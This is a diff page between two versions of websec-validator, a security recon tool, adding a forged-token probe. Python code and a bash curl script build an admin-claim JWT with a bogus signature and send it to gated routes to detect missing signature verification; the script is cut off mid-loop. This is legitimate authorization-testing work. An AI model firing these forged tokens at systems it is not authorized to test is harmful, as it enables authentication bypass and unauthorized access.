websec-validator 0.2.4__tar.gz → 0.2.5__tar.gz

This diff compares the contents of two publicly available package versions that have been released to one of the supported registries. It is provided for informational purposes only and reflects the changes between those versions as they appear in their respective public registries.
Files changed (60)
  1. {websec_validator-0.2.4/src/websec_validator.egg-info → websec_validator-0.2.5}/PKG-INFO +1 -1
  2. {websec_validator-0.2.4 → websec_validator-0.2.5}/pyproject.toml +1 -1
  3. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/cli.py +14 -1
  4. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/dynamic.py +85 -2
  5. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/routes.py +16 -2
  6. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/findings.py +14 -0
  7. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/probes.py +8 -1
  8. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/scanners.py +62 -7
  9. websec_validator-0.2.5/src/websec_validator/templates/probes/forged-token.sh +84 -0
  10. websec_validator-0.2.5/src/websec_validator/templates/probes/rate-limit-burst.sh +89 -0
  11. {websec_validator-0.2.4 → websec_validator-0.2.5/src/websec_validator.egg-info}/PKG-INFO +1 -1
  12. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator.egg-info/SOURCES.txt +2 -0
  13. websec_validator-0.2.5/tests/test_hardening.py +137 -0
  14. websec_validator-0.2.4/src/websec_validator/templates/probes/rate-limit-burst.sh +0 -136
  15. {websec_validator-0.2.4 → websec_validator-0.2.5}/LICENSE +0 -0
  16. {websec_validator-0.2.4 → websec_validator-0.2.5}/README.md +0 -0
  17. {websec_validator-0.2.4 → websec_validator-0.2.5}/setup.cfg +0 -0
  18. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/__init__.py +0 -0
  19. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/briefing.py +0 -0
  20. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/calibration.json +0 -0
  21. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/calibration.py +0 -0
  22. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/constitution.py +0 -0
  23. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/corpus.json +0 -0
  24. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/__init__.py +0 -0
  25. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/auth.py +0 -0
  26. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/authz.py +0 -0
  27. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/base.py +0 -0
  28. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/client_exposure.py +0 -0
  29. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/graphql.py +0 -0
  30. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/iac_ci.py +0 -0
  31. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/integrations.py +0 -0
  32. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/schemas.py +0 -0
  33. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/stack.py +0 -0
  34. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/surface.py +0 -0
  35. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/extractors/tenant.py +0 -0
  36. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/proof.py +0 -0
  37. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/recon.py +0 -0
  38. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/report.py +0 -0
  39. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/_lib.py +0 -0
  40. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/bola-cross-tenant.sh +0 -0
  41. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/bola-write-verbs.py +0 -0
  42. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/compare-roles.sh +0 -0
  43. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/dlp-bypass-offline.py +0 -0
  44. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/hs256-brute-force.py +0 -0
  45. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/jwt-attacks.sh +0 -0
  46. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/mass-assignment.py +0 -0
  47. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/race-conditions.py +0 -0
  48. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/s3-assess.sh +0 -0
  49. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/ssrf-probes.sh +0 -0
  50. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/unauth-baseline.sh +0 -0
  51. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/probes/webhook-forgery.py +0 -0
  52. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/FINDINGS-SUMMARY.md.template +0 -0
  53. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/access-control-matrix.md.template +0 -0
  54. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/findings-triage.md.template +0 -0
  55. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/pentest-handover-brief.md.template +0 -0
  56. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator/templates/reports/per-tool-FINDINGS.md.template +0 -0
  57. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator.egg-info/dependency_links.txt +0 -0
  58. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator.egg-info/entry_points.txt +0 -0
  59. {websec_validator-0.2.4 → websec_validator-0.2.5}/src/websec_validator.egg-info/top_level.txt +0 -0
  60. {websec_validator-0.2.4 → websec_validator-0.2.5}/tests/test_recon.py +0 -0
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: websec-validator
3
- Version: 0.2.4
3
+ Version: 0.2.5
4
4
  Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
5
5
  Author: Ricardo Accioly
6
6
  License: MIT
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
4
4
 
5
5
  [project]
6
6
  name = "websec-validator"
7
- version = "0.2.4"
7
+ version = "0.2.5"
8
8
  description = "Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app."
9
9
  readme = "README.md"
10
10
  requires-python = ">=3.11"
@@ -103,9 +103,16 @@ def cmd_run(args) -> int:
103
103
  for r in scan_results:
104
104
  tag = r.get("findings", r.get("status", "?"))
105
105
  print(f" {r['name']}: {tag}")
106
- unified = scanners.normalize_findings(scan_results, out)
106
+ unified = scanners.normalize_findings(scan_results, out, target=target)
107
107
  print(f" → {unified['total']} de-duplicated findings "
108
108
  f"({unified['cross_tool_or_dup_merged']} merged) · {unified['by_severity']}")
109
+ _hyg = []
110
+ if unified.get('contamination_dropped'):
111
+ _hyg.append(f"{unified['contamination_dropped']} dropped (skip-dir contamination)")
112
+ if unified.get('local_only_downgraded'):
113
+ _hyg.append(f"{unified['local_only_downgraded']} downgraded (gitignored/local-only secret)")
114
+ if _hyg:
115
+ print(f" hygiene: {' · '.join(_hyg)}")
109
116
  else:
110
117
  print(f"\n scanners available: {', '.join(s['name'] for s in det['available']) or 'none'}"
111
118
  " (add --scan to execute them)")
@@ -162,6 +169,12 @@ def cmd_dynamic(args) -> int:
162
169
  for r in u["results"]:
163
170
  mark = "🔓" if r["verdict"] == "OPEN-no-auth" else (" ·" if r["verdict"] == "protected" else " ")
164
171
  print(f" {mark} {str(r['status']):>4} {r['verdict']:26} {r['path']}")
172
+ ftb = dyn.get("forged_token_bypass", {})
173
+ if ftb:
174
+ print(f"\n forged-token (unverified-signature) → {ftb['summary']}")
175
+ for r in ftb.get("results", []):
176
+ if r["verdict"] == "BYPASS":
177
+ print(f" 🚨 BYPASS {r['baseline']}→{r['forged']} {r['method']} {r['path']} (via {r['via']})")
165
178
  if args.probe_writes:
166
179
  w = dyn["write_auth_enforcement"]
167
180
  print(f"\n write-verb auth enforcement → {w['summary']}")
@@ -37,10 +37,13 @@ def _dig(d: dict, dotted: str):
37
37
  return cur
38
38
 
39
39
 
40
- def _request(method: str, url: str, token: str | None, timeout: int = 20, data: bytes | None = None):
40
+ def _request(method: str, url: str, token: str | None, timeout: int = 20,
41
+ data: bytes | None = None, cookie: str | None = None):
41
42
  headers = {"Accept": "application/json"}
42
43
  if token:
43
44
  headers["Authorization"] = f"Bearer {token}"
45
+ if cookie:
46
+ headers["Cookie"] = cookie
44
47
  if data is not None:
45
48
  headers["Content-Type"] = "application/json"
46
49
  req = urllib.request.Request(url, method=method, headers=headers, data=data)
@@ -254,9 +257,89 @@ def write_auth_enforcement(target: str, facts: dict, max_endpoints: int = 80) ->
254
257
  }
255
258
 
256
259
 
260
+ # Codes that mean "the request reached the handler/validation" — i.e. auth PASSED. Used to
261
+ # judge a forged-token attempt. Deliberately EXCLUDES 401/403 (blocked), 429 (rate-limited —
262
+ # would otherwise be a false bypass), 5xx and 000/None (ambiguous/transport). A gated route
263
+ # (401/403 with no token) that returns one of these WITH a forged token = signature not verified.
264
+ _REACHED_HANDLER = {200, 201, 202, 203, 204, 206, 400, 404, 405, 409, 413, 415, 422}
265
+
266
+
267
+ def _forge_jwt(payload: dict, alg: str = "RS256") -> str:
268
+ """A structurally-valid JWT with a DELIBERATELY INVALID signature (no real key). The whole
269
+ point is to see whether the target verifies the signature at all — a correct verifier
270
+ rejects this outright; a decode-only auth path (the decodeJwtPayloadUnsafe class) trusts it."""
271
+ import base64
272
+
273
+ def b(o):
274
+ return base64.urlsafe_b64encode(json.dumps(o).encode()).rstrip(b"=").decode()
275
+ sig = "" if alg == "none" else "d2Vic2VjLWZvcmdlZC1zaWc" # 'websec-forged-sig' — not a real signature
276
+ return ".".join([b({"alg": alg, "typ": "JWT", "kid": "forged"}), b(payload), sig])
277
+
278
+
279
+ def forged_token_bypass(target: str, facts: dict, cookie_names=None,
280
+ probe_writes: bool = False, max_endpoints: int = 60) -> dict:
281
+ """Does the app actually VERIFY JWT signatures? Forge a token with a far-future `exp` and a
282
+ BOGUS signature, present it to each route that is GATED without auth, and compare. A route
283
+ that answers 401/403 with NO token but REACHES THE HANDLER with the forged token is trusting
284
+ an unverified token = authentication bypass (CWE-347 / OWASP API2:2023) — the dynamic verdict
285
+ on the `decodeJwtPayloadUnsafe`/`jwt.decode(verify=False)` hypothesis.
286
+
287
+ GET reads by default (read-safe); write verbs (empty body, dummy ids — non-destructive) only
288
+ when `probe_writes`. Tries `Authorization: Bearer` (universal) plus any `cookie_names` given,
289
+ since apps read tokens from different locations. 429/5xx are treated as inconclusive, never
290
+ a bypass, so an aggressive rate limiter can't manufacture a false positive."""
291
+ forged = _forge_jwt({"sub": "websec-forged", "email": "websec-forged@example.com",
292
+ "role": "admin", "roles": ["admin"], "exp": 9999999999})
293
+ cookie_names = list(cookie_names or [])
294
+
295
+ targets = [("GET", e.get("path", "")) for e in (facts.get("routes") or {}).get("endpoints", [])
296
+ if e.get("method") == "GET" and "{" not in e.get("path", "")
297
+ and not SIDE_EFFECTING.search(e.get("path", ""))]
298
+ if probe_writes:
299
+ targets += [(e.get("method"), e.get("path", "")) for e in (facts.get("routes") or {}).get("endpoints", [])
300
+ if e.get("method") in WRITE_VERBS and "{" not in e.get("path", "")
301
+ and not SIDE_EFFECTING.search(e.get("path", ""))]
302
+ targets = sorted(set(targets))[:max_endpoints]
303
+
304
+ results, bypassed = [], []
305
+ for method, path in targets:
306
+ url = target + path
307
+ body = b"{}" if method in WRITE_VERBS else None
308
+ base_code, _ = _request(method, url, token=None, data=body)
309
+ if base_code not in (401, 403):
310
+ continue # only routes that are gated WITHOUT auth tell us anything about forgery
311
+ attempts = [("Authorization: Bearer", _request(method, url, token=forged, data=body)[0])]
312
+ for cn in cookie_names:
313
+ attempts.append((f"cookie:{cn}", _request(method, url, token=None, data=body, cookie=f"{cn}={forged}")[0]))
314
+ hit = next(((via, code) for via, code in attempts if code in _REACHED_HANDLER), None)
315
+ if hit:
316
+ via, fcode = hit
317
+ row = {"method": method, "path": path, "baseline": base_code, "forged": fcode,
318
+ "via": via, "verdict": "BYPASS"}
319
+ bypassed.append(row)
320
+ else:
321
+ row = {"method": method, "path": path, "baseline": base_code,
322
+ "forged": attempts[0][1], "via": "Authorization: Bearer", "verdict": "rejected"}
323
+ results.append(row)
324
+
325
+ return {
326
+ "target": target,
327
+ "mode": "present an UNSIGNED/bogus-sig JWT (far-future exp) to each gated route; "
328
+ "reached-handler = signature not verified",
329
+ "token_locations": ["Authorization: Bearer"] + [f"cookie:{c}" for c in cookie_names],
330
+ "tested": len(results),
331
+ "bypassed": bypassed,
332
+ "results": results,
333
+ "summary": f"{len(bypassed)}/{len(results)} gated route(s) accepted a forged unsigned token"
334
+ + (" — ⚠ SIGNATURE NOT VERIFIED (CWE-347 auth bypass)" if bypassed
335
+ else " — all rejected the forged token"),
336
+ }
337
+
338
+
257
339
  def run_unauth(target: str, facts_path: Path, outdir: Path, probe_writes: bool = False) -> dict:
258
340
  facts = json.loads(Path(facts_path).read_text())
259
- res = {"unauth_reachability": unauth_reachability(target, facts)}
341
+ res = {"unauth_reachability": unauth_reachability(target, facts),
342
+ "forged_token_bypass": forged_token_bypass(target, facts, probe_writes=probe_writes)}
260
343
  if probe_writes:
261
344
  res["write_auth_enforcement"] = write_auth_enforcement(target, facts)
262
345
  outdir.mkdir(parents=True, exist_ok=True)
@@ -25,7 +25,18 @@ import subprocess
25
25
  import tempfile
26
26
  from pathlib import Path
27
27
 
28
- from .base import Extractor, RepoContext
28
+ from .base import SKIP_DIRS, Extractor, RepoContext
29
+
30
+ # Noir is a subprocess that scans the raw tree — it does NOT know the walker's SKIP_DIRS,
31
+ # so without this it grinds through (and emits routes from) build output (.next, cdk.out,
32
+ # dist), dependencies (node_modules, vendor), and NESTED WORKTREES (.claude/worktrees — a
33
+ # full copy of the repo → doubled routes). Pass the skip dirs as exclude globs (perf) AND
34
+ # post-filter Noir's output by code_path (the correctness guarantee).
35
+ _NOIR_SKIP_GLOBS = ",".join(f"**/{d}/**" for d in sorted(SKIP_DIRS))
36
+
37
+
38
+ def _in_skip_dir(code_path: str) -> bool:
39
+ return any(part in SKIP_DIRS for part in (code_path or "").replace("\\", "/").split("/"))
29
40
 
30
41
  WRITE_VERBS = {"POST", "PUT", "PATCH", "DELETE"}
31
42
  EXCLUDE_GLOBS = "*.test.ts,*.test.tsx,*.spec.ts,*.test.js,*.spec.js,*_test.go,*_test.py,test_*.py,*.stories.tsx"
@@ -71,7 +82,7 @@ def _noir_scan(root: Path, extra_excludes: list | None = None) -> list | None:
71
82
  """Run Noir → list of endpoint dicts, or None if Noir unavailable/failed."""
72
83
  if not shutil.which("noir"):
73
84
  return None
74
- excl = EXCLUDE_GLOBS + ("," + ",".join(extra_excludes) if extra_excludes else "")
85
+ excl = ",".join([EXCLUDE_GLOBS, _NOIR_SKIP_GLOBS] + (list(extra_excludes) if extra_excludes else []))
75
86
  with tempfile.NamedTemporaryFile(suffix=".json", delete=False) as tf:
76
87
  out = Path(tf.name)
77
88
  try:
@@ -222,6 +233,9 @@ class RoutesExtractor(Extractor):
222
233
  # unreliable for bare dir names; this guarantees `--exclude <path>` drops those routes).
223
234
  if getattr(ctx, "excludes", None):
224
235
  routes = [r for r in routes if not ctx._excluded(r.get("code_path", ""))]
236
+ # Noir doesn't honor SKIP_DIRS — drop any route it found under build output / deps /
237
+ # nested worktrees (e.g. .claude/worktrees/* doubling the whole app).
238
+ routes = [r for r in routes if not _in_skip_dir(r.get("code_path", ""))]
225
239
  by_method: dict = {}
226
240
  by_tech: dict = {}
227
241
  for r in routes:
@@ -164,6 +164,20 @@ def build_ledger(facts: dict, unified: dict | None, dynamic: dict | None = None,
164
164
  f"{ud.get('decoder')}() — if that decodes a token/signature WITHOUT verifying it, a forged "
165
165
  "value is trusted (the decodeJwtPayloadUnsafe → requireAdmin class of bug). Trace the call path."}]))
166
166
 
167
+ # ---- 1d. Forged-token acceptance — unverified signature, DYNAMICALLY CONFIRMED ----
168
+ # The verdict for 1c: we presented an UNSIGNED/bogus-sig token and the route reached its
169
+ # handler anyway (no-auth 401/403 → reached-handler with the forged token). That is the
170
+ # decodeJwtPayloadUnsafe/jwt.decode(verify=False) hypothesis proven — CWE-347 broken auth.
171
+ for b in ((dynamic or {}).get("forged_token_bypass", {}) or {}).get("bypassed", []):
172
+ out.append(_f(
173
+ f"Auth bypass: forged unsigned token accepted — {b.get('method')} {b.get('path')}",
174
+ "access-control", "unsafe-auth-decoder", "CRITICAL", "HIGH",
175
+ f"{b.get('method')} {b.get('path')}",
176
+ [{"layer": "dynamic", "detail": f"no auth → HTTP {b.get('baseline')}; a token with NO valid "
177
+ f"signature (via {b.get('via')}, far-future exp) → HTTP {b.get('forged')} — the auth gate "
178
+ "accepted it, so the signature is NOT verified. Reachable by anyone who can craft a token "
179
+ "string; route the guard through a verifying decode (jwt.verify w/ the key / a checked session)."}]))
180
+
167
181
  # ---- 2. Static scanner findings (de-duplicated `unified`) ----
168
182
  cat_to_class = {"sca": "cve", "secret": "secret", "iac": "iac", "sast": "sast"}
169
183
  for t in (unified or {}).get("top", []):
@@ -28,6 +28,8 @@ PROBES = {
28
28
  "a low-priv token + a write endpoint that updates a record"),
29
29
  "jwt-attacks": ("jwt-attacks.sh", "JWT: alg:none, tamper, expiry, replay",
30
30
  "a valid token + the login + a protected endpoint"),
31
+ "forged-token": ("forged-token.sh", "Forged/unsigned-JWT acceptance (CWE-347 broken auth)",
32
+ "just the target base URL — it forges its own token + reads routes from probe-context.json"),
31
33
  "hs256-brute-force": ("hs256-brute-force.py", "Offline HS256 weak-secret brute",
32
34
  "one HS256 JWT (offline — no live app needed)"),
33
35
  "ssrf-probes": ("ssrf-probes.sh", "SSRF: IMDS / RFC1918 / file://",
@@ -47,7 +49,7 @@ PROBES = {
47
49
 
48
50
  # unauth-baseline is ALWAYS staged: it's the cheapest probe and directly exercises the
49
51
  # #1 lead class (missing authentication) — the one a no-creds run can confirm immediately.
50
- ALWAYS = ["unauth-baseline", "jwt-attacks", "hs256-brute-force", "rate-limit-burst"]
52
+ ALWAYS = ["unauth-baseline", "forged-token", "jwt-attacks", "hs256-brute-force", "rate-limit-burst"]
51
53
 
52
54
  # which targeting bucket each probe should be pointed at (for the manifest's real targets)
53
55
  _TARGET_KEYS = {
@@ -100,6 +102,10 @@ def build_context(facts: dict) -> dict:
100
102
  auth = facts.get("auth") or {}
101
103
  writes = [f"{e.get('method')} {e.get('path')}" for e in routes.get("endpoints", [])
102
104
  if e.get("method") in WRITE_VERBS][:80]
105
+ # GET/HEAD data-read routes — the read half of the protected surface (the forged-token probe
106
+ # needs these; the bypass class hits reads like /api/wallets/lookup that are in no other bucket).
107
+ reads = [f"{e.get('method')} {e.get('path')}" for e in routes.get("endpoints", [])
108
+ if e.get("method") in ("GET", "HEAD")][:80]
103
109
  return {
104
110
  "target_base_url": "FILL_ME (e.g. http://localhost:3000)",
105
111
  "auth": {
@@ -111,6 +117,7 @@ def build_context(facts: dict) -> dict:
111
117
  },
112
118
  "endpoints": {
113
119
  "writes": writes,
120
+ "reads": reads,
114
121
  "idor_candidates": tgt.get("idor_candidates", [])[:60],
115
122
  "ssrf_candidates": tgt.get("ssrf_candidates", [])[:40],
116
123
  "upload_candidates": tgt.get("upload_candidates", [])[:40],
@@ -20,6 +20,8 @@ import subprocess
20
20
  from dataclasses import dataclass
21
21
  from pathlib import Path
22
22
 
23
+ from .extractors.base import SKIP_DIRS
24
+
23
25
 
24
26
  @dataclass(frozen=True)
25
27
  class Scanner:
@@ -33,11 +35,19 @@ class Scanner:
33
35
  argv: object = None
34
36
 
35
37
 
36
- # Never scan the tool's own output, deps, or build artifacts. Scanning `websec-out/`
37
- # made Semgrep re-flag the AWS keys Gitleaks had just written into the report (and the
38
- # count compounded across runs). Filesystem scanners get these excluded explicitly.
39
- EXCLUDE_DIRS = ("websec-out", "node_modules", ".next", "dist", "build", ".git",
40
- "security", ".venv", "venv", "__pycache__", ".mypy_cache", "coverage")
38
+ # ONE source of truth for "don't scan here": the walker's SKIP_DIRS (extractors/base.py).
39
+ # A subprocess scanner has its OWN traversal and will otherwise re-enter dirs the walker
40
+ # skips e.g. trivy walked `.claude/worktrees/<full-repo-copy>/websec-out/.../gitleaks.json`
41
+ # and reported the tool's OWN prior output back as an AWS-key CRITICAL (bug-066). The
42
+ # --skip-dirs / --exclude flags below are best-effort perf; `_in_skip_dir` post-filtering in
43
+ # normalize_findings is the correctness guarantee (it also covers gitleaks, which has no skip
44
+ # flag). Was previously a hand-maintained subset that omitted .claude / .worktrees / .wolf.
45
+ EXCLUDE_DIRS = tuple(sorted(SKIP_DIRS))
46
+
47
+
48
+ def _in_skip_dir(path: str) -> bool:
49
+ """True if any path segment is a SKIP_DIR — mirrors the walker's per-segment rule."""
50
+ return any(part in SKIP_DIRS for part in (path or "").replace("\\", "/").split("/"))
41
51
 
42
52
 
43
53
  def _trivy(target: Path, out: Path, excludes=()) -> list:
@@ -243,9 +253,30 @@ def _norm_semgrep(data: dict) -> list:
243
253
  _PARSERS = {"trivy": _norm_trivy, "gitleaks": _norm_gitleaks, "semgrep": _norm_semgrep}
244
254
 
245
255
 
246
- def normalize_findings(scan_results: list, outdir: Path) -> dict:
256
+ def _gitignored(target: Path | None, paths) -> set:
257
+ """Subset of `paths` (relative to `target`) that git IGNORES — local-only files that were
258
+ never committed. A WORKING-TREE secret in such a file (e.g. a gitignored `.env.local`) is
259
+ not a repo leak, so we downgrade it instead of crying CRITICAL (bug-066). Empty set if not
260
+ a git repo / git absent (fail-open). Git-HISTORY findings (gitleaks) are left untouched —
261
+ those ARE committed."""
262
+ paths = sorted({p for p in paths if p})
263
+ if not target or not paths or not shutil.which("git"):
264
+ return set()
265
+ try:
266
+ proc = subprocess.run(["git", "-C", str(target), "check-ignore", "--stdin"],
267
+ input="\n".join(paths), capture_output=True, text=True, timeout=30)
268
+ return {ln.strip() for ln in proc.stdout.splitlines() if ln.strip()}
269
+ except Exception:
270
+ return set()
271
+
272
+
273
+ def normalize_findings(scan_results: list, outdir: Path, target: Path | None = None) -> dict:
247
274
  """Merge every scanner's native JSON into one de-duplicated, severity-ranked
248
- findings.json. Returns a summary (raw vs deduped, by severity/category)."""
275
+ findings.json. Returns a summary (raw vs deduped, by severity/category).
276
+
277
+ `target` (the scanned repo) enables two bug-066 hygiene passes: drop findings under a
278
+ SKIP_DIR (a scanner re-entered a dir the walker skips), and downgrade working-tree secrets
279
+ that live in gitignored (never-committed) files."""
249
280
  raw = []
250
281
  for r in scan_results:
251
282
  out, key = r.get("output"), r.get("key")
@@ -257,6 +288,28 @@ def normalize_findings(scan_results: list, outdir: Path) -> dict:
257
288
  except Exception:
258
289
  continue
259
290
 
291
+ # bug-066 (a): a subprocess scanner can re-enter dirs the walker skips (nested worktrees,
292
+ # build output, the tool's own websec-out) → drop anything under a SKIP_DIR. The
293
+ # correctness guarantee behind the best-effort flags; also catches gitleaks (no skip flag).
294
+ before = len(raw)
295
+ raw = [f for f in raw if not _in_skip_dir(f.get("file", ""))]
296
+ contamination_dropped = before - len(raw)
297
+
298
+ # bug-066 (b): working-tree secrets (trivy fs) in GITIGNORED files are local-only / never
299
+ # committed — not a repo leak. Downgrade + annotate rather than report CRITICAL. Gitleaks
300
+ # findings come from git HISTORY (already committed) and are deliberately left alone.
301
+ ignored = _gitignored(target, (f.get("file", "") for f in raw
302
+ if f.get("tool") == "trivy" and f.get("category") == "secret"))
303
+ local_only_downgraded = 0
304
+ for f in raw:
305
+ if (f.get("tool") == "trivy" and f.get("category") == "secret"
306
+ and f.get("file", "") in ignored
307
+ and SEV_ORDER.get(f.get("severity"), 0) >= SEV_ORDER["MEDIUM"]):
308
+ f["severity"] = "LOW"
309
+ if "local-only" not in f["title"]:
310
+ f["title"] += " — local-only (gitignored, never committed; rotate if real, not a repo leak)"
311
+ local_only_downgraded += 1
312
+
260
313
  by_fp: dict = {}
261
314
  for f in raw:
262
315
  fp = f["fingerprint"]
@@ -278,6 +331,8 @@ def normalize_findings(scan_results: list, outdir: Path) -> dict:
278
331
  by_cat[f["category"]] = by_cat.get(f["category"], 0) + 1
279
332
  return {"total_raw": len(raw), "total": len(deduped),
280
333
  "cross_tool_or_dup_merged": len(raw) - len(deduped),
334
+ "contamination_dropped": contamination_dropped,
335
+ "local_only_downgraded": local_only_downgraded,
281
336
  "by_severity": by_sev, "by_category": by_cat,
282
337
  "top": [{"severity": f["severity"], "category": f["category"], "title": f["title"],
283
338
  "file": f["file"], "tools": f["tools"]} for f in deduped[:15]]}
@@ -0,0 +1,84 @@
1
+ #!/usr/bin/env bash
2
+ # forged-token — does this app actually VERIFY JWT signatures? Forge a token with a BOGUS
3
+ # signature + far-future exp and present it to each route that is GATED without auth. A route
4
+ # that returns 401/403 with NO token but REACHES THE HANDLER (200/400/404/422/…) WITH the
5
+ # forged token is trusting an UNVERIFIED token = authentication bypass (CWE-347 / OWASP API2).
6
+ # This is the dynamic VERDICT on a `decodeJwtPayloadUnsafe` / `jwt.decode(verify=False)` finding:
7
+ # the recon says "an unverified decoder feeds an auth decision"; this proves which routes fall.
8
+ #
9
+ # Read-only by default (GET routes). Set PROBE_WRITES=1 to ALSO test write verbs (empty body —
10
+ # non-destructive) — LOCALHOST/TEST only. Reads this app's routes from ./probe-context.json
11
+ # (written by websec). Tries Authorization: Bearer, plus a cookie if you pass COOKIE_NAME.
12
+ # Usage: TARGET=https://127.0.0.1:8443 [PROBE_WRITES=1] [COOKIE_NAME=session] bash forged-token.sh
13
+ set -uo pipefail
14
+ ctx="$(dirname "$0")/probe-context.json"
15
+ BASE="${TARGET:-$(python3 -c "import json;print(json.load(open('$ctx'))['target_base_url'])" 2>/dev/null)}"
16
+ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then
17
+ echo "Set TARGET=http://host:port (or fill target_base_url in probe-context.json)"; exit 2
18
+ fi
19
+ BASE="${BASE%/}"
20
+
21
+ # A structurally-valid JWT with a DELIBERATELY INVALID signature + far-future exp. A correct
22
+ # verifier rejects this outright; a decode-only auth path trusts its claims.
23
+ FORGED=$(python3 -c "
24
+ import base64, json
25
+ def b(o): return base64.urlsafe_b64encode(json.dumps(o).encode()).rstrip(b'=').decode()
26
+ print(b({'alg':'RS256','typ':'JWT','kid':'forged'})+'.'+b({'sub':'websec-forged','email':'websec-forged@example.com','role':'admin','roles':['admin'],'exp':9999999999})+'.d2Vic2VjLWZvcmdlZC1zaWc')
27
+ ")
28
+
29
+ # Routes to test: GET reads + GET idor/ssrf candidates (always); writes when PROBE_WRITES=1.
30
+ # Skip any path with an unfilled {param}. (portable; macOS bash 3.2 lacks `mapfile`.)
31
+ ROUTES=()
32
+ while IFS= read -r line; do [ -n "$line" ] && ROUTES+=("$line"); done < <(PROBE_WRITES="${PROBE_WRITES:-0}" python3 -c "
33
+ import json, os
34
+ c = json.load(open('$ctx')); eps = c['endpoints']
35
+ rows = list(eps.get('reads', []))
36
+ rows += [r.split(' ')[0] for r in eps.get('ssrf_candidates', [])] # 'GET /x (param: y)' -> 'GET /x'
37
+ rows += [r for r in eps.get('idor_candidates', []) if r.split(' ',1)[0] == 'GET']
38
+ if os.environ.get('PROBE_WRITES') == '1': rows += eps.get('writes', [])
39
+ seen=set(); out=[]
40
+ for r in rows:
41
+ m = r.strip().split(' ', 1)
42
+ if len(m) != 2: continue
43
+ meth, path = m[0], m[1].split(' ')[0].strip()
44
+ if '{' in path or (meth, path) in seen: continue
45
+ seen.add((meth, path)); out.append(meth + ' ' + path)
46
+ print('\n'.join(out[:80]))
47
+ " 2>/dev/null)
48
+ if [ "${#ROUTES[@]}" -eq 0 ]; then
49
+ echo "No concrete (no-{param}) routes in probe-context.json to test."; exit 2
50
+ fi
51
+
52
+ # Codes that mean the request REACHED THE HANDLER (auth passed). Excludes 401/403 (blocked),
53
+ # 429 (rate-limited), 5xx/000 (ambiguous) so an aggressive limiter can't manufacture a bypass.
54
+ reached() { case "$1" in 200|201|202|203|204|206|400|404|405|409|413|415|422) return 0;; *) return 1;; esac; }
55
+
56
+ echo "forged-token vs $BASE · unsigned/bogus-sig JWT, far-future exp"
57
+ echo " (a gated route that REACHES its handler with this token is NOT verifying the signature)"
58
+ echo "----------------------------------------------------------------------------------------------------"
59
+ bypass=0; ok=0; skip=0
60
+ for ep in "${ROUTES[@]}"; do
61
+ method="${ep%% *}"; path="${ep#* }"
62
+ data=(); { [ "$method" != "GET" ] && [ "$method" != "HEAD" ]; } && data=(-H 'content-type: application/json' --data '{}')
63
+ na=$(curl -s -o /dev/null -w '%{http_code}' -X "$method" "$BASE$path" ${data[@]+"${data[@]}"} --max-time 15)
64
